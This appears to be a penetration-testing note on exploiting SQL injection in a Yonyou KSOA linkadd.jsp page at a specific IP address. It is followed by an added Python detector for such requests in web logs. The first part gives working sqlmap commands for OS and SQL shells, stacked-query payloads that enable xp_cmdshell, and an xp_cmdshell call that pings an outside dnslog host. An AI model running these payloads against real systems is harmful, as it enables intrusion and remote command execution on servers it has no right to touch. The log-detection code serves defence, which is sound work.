SQL injection

select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' -- returns 1 if it exists

python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890

Contents of point.txt:

id=666666 is the injection point; the * tells sqlmap to test this position first.

GET /linksframe/linkadd.jsp?id=666666* HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

From sqlmap's output you can see which DBMS is in use, for example Microsoft SQL Server (MSSQL).

python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --os-shell

Use this command to check whether an OS shell can be picked up.

python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --sql-shell

Use this command to get a SQL shell, in which SQL statements can be executed.

http://1.196.238.71:93/linksframe/linkadd.jsp?id=666666';WAITFOR DELAY '0:0:5'--
GET /linksframe/linkadd.jsp?id=666666' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,'33';WAITFOR DELAY '0:0:4' HTTP/1.1

This is how to test whether stacked queries (stacked injection) work.

In the SQL shell, check whether xp_cmdshell is available:

select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' -- returns 1 if it exists

The reason stacked injection is needed: xp_cmdshell has to be enabled first, and the configuration then saved with reconfigure, before it can be used.

' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,null;
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec master..xp_cmdshell 'ping 6byyxc.dnslog.cn'

sys.fn_sqlvarbasetostr is what makes the MD5 value echo back in the response.

The payload must end with a comment.

GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%209af%2cnull%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'GRYFF'))%2cnull%2cnull%2cnull%3bexec%20sp_configure%20'show%20advanced%20options'%2c%201%3breconfigure%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

Also, sometimes the SQL injection must carry the preceding query (the SELECT part) in front of the stacked statements.
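From the defender's side, the requests above are easy to spot in web-server access logs once the query string is percent-decoded: a numeric id parameter that suddenly carries quotes, a ";" followed by EXEC/CREATE/WAITFOR (stacked queries), sp_configure and RECONFIGURE (the xp_cmdshell enable step), or WAITFOR DELAY (time-based probing). The following detector is an added example written for this note, not code from the original write-up or from the vendor. The log lines it scans are constructed samples that mirror the shapes of the payloads shown above; the rule names, severity levels and the assumption that id is numeric in legitimate use are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from any real log). The first three
# mirror the payload shapes in this note; the last two are benign traffic.
SAMPLE_REQUESTS = [
    "GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull"
    "%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20"
    "'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1",
    "GET /linksframe/linkadd.jsp?id=666666'%3bWAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1",
    "GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull"
    "%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b-- HTTP/1.1",
    "GET /linksframe/linkadd.jsp?id=666666 HTTP/1.1",
    "GET /linksframe/linkadd.jsp?id=42&name=hello%20world HTTP/1.1",
]

# Detection rules, applied to the fully decoded query string (case-insensitive).
RULES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("stacked_query", re.compile(r";\s*(?:exec|execute|create|insert|update|delete|drop|declare|waitfor)\b", re.I)),
    ("sp_configure", re.compile(r"\bsp_configure\b", re.I)),
    ("reconfigure", re.compile(r"\breconfigure\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("time_based_blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>.*?)\s+HTTP/\d\.\d\s*$")


def decode_fully(s, max_rounds=3):
    """Percent-decode repeatedly (payloads are sometimes double-encoded) until stable."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def split_request_line(line):
    """Return (method, path, raw_query) or None if the line is not an HTTP request line."""
    m = REQUEST_LINE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return m.group("method"), path, query


def analyze_request(line):
    """Decode one request line and return the rule names that fire on its query string."""
    parsed = split_request_line(line)
    if parsed is None:
        return {"parsed": False, "findings": [], "suspicious": False}
    method, path, query = parsed
    decoded = decode_fully(query)
    findings = [name for name, rx in RULES if rx.search(decoded)]
    # Assumption: linkadd.jsp's id parameter is numeric in legitimate use, so a
    # non-numeric value is a cheap extra signal independent of the keyword rules.
    m = re.search(r"(?:^|&)id=([^&]*)", decoded)
    if m and not m.group(1).isdigit():
        findings.append("non_numeric_id")
    return {"parsed": True, "method": method, "path": path,
            "decoded_query": decoded, "findings": findings, "suspicious": bool(findings)}


def severity(findings):
    """Rank findings: touching server configuration toward OS command execution is the worst."""
    fs = set(findings)
    if fs & {"xp_cmdshell", "sp_configure"}:
        return "critical"
    if "stacked_query" in fs:
        return "high"
    if fs & {"union_select", "time_based_blind"}:
        return "medium"
    return "low" if fs else "none"


def scan(lines):
    """Analyze many request lines; returns one record per line with its severity."""
    results = []
    for line in lines:
        r = analyze_request(line)
        r["line"] = line
        r["severity"] = severity(r["findings"])
        results.append(r)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        print(f"[{r['severity']:8}] {r['findings']}  <- {r.get('decoded_query', '')[:70]}")
```

Decoding before matching matters: the raw log line contains `%3bEXEC` and `%2c`, so a rule written against the encoded form misses trivial variants. Alerting on sp_configure/xp_cmdshell in a web request should be treated as a configuration-change attempt, not just an injection probe, and paired with a check of the database server's `xp_cmdshell` setting.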

Prototype for this SQL injection case:

[9.6 routine optimization][SQL-to-RCE template] 用友 KSOA linkadd.jsp SQL injection (CVD-2023-1698).go
